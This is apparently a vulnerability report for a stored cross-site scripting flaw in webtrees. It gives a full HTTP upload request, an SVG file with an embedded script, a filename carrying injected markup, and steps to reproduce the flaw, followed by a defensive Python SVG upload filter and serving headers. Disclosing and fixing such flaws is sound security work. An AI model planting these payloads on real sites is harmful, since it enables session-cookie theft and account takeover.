Stored XSS via upload file .svg allows for arbitrary execution of JavaScript
// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"

NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"

upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src>.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"

0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"

0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"


-----------------------------405026258827833307651807573856--
Create a .svg file containing the payload.
Example:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
Go to the details page of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Under the Edit button choose ‘Add a media file’.
Upload the .svg file and save it.
The XSS triggers when a user clicks the media file: the browser loads the SVG as a document in the site's origin and runs the embedded script.
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
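As an added example, not part of the original report or of the webtrees code base: a server-side gate in Python that rejects an uploaded SVG carrying script (the <script> element the PoC relies on, event-handler attributes, and javascript:/data: hrefs), plus the response headers that keep a stored SVG from executing as a page in the site's origin. The tag and attribute policy is an assumption chosen for illustration, not a standard list.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical policy for this example: elements that can run or embed
# active content inside an SVG, plus URL schemes that execute script.
ACTIVE_TAGS = {"script", "handler", "foreignObject", "iframe", "embed", "object"}
SCRIPT_URL = re.compile(r"^\s*(javascript|data)\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def svg_rejection_reason(data: bytes) -> "str | None":
    """Return why an uploaded SVG must be rejected, or None if it passes.
    xml.etree does not guard against entity-expansion bombs; parse untrusted
    input with defusedxml in production."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return f"not well-formed XML: {exc}"
    if _local(root.tag) != "svg":
        return f"root element is <{_local(root.tag)}>, not <svg>"
    for el in root.iter():  # walks the root and every descendant element
        name = _local(el.tag)
        if name in ACTIVE_TAGS:
            return f"active element <{name}>"
        for attr, value in el.attrib.items():
            aname = _local(attr)  # handles xlink:href as well as plain href
            if aname.lower().startswith("on"):
                return f"event handler attribute {aname}"
            if aname == "href" and SCRIPT_URL.match(value):
                return f"scriptable URL in {aname}"
    return None


def download_headers() -> dict:
    """Headers for serving a stored SVG: force a download and deny script via
    CSP, so a file that slipped past the upload check still cannot run as a page."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed samples: the payload from the PoC above, and a benign drawing.
POC_SVG = b"""<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255)" />
<script type="text/javascript">alert("Ghostlulz XSS");</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="10"/></svg>'
```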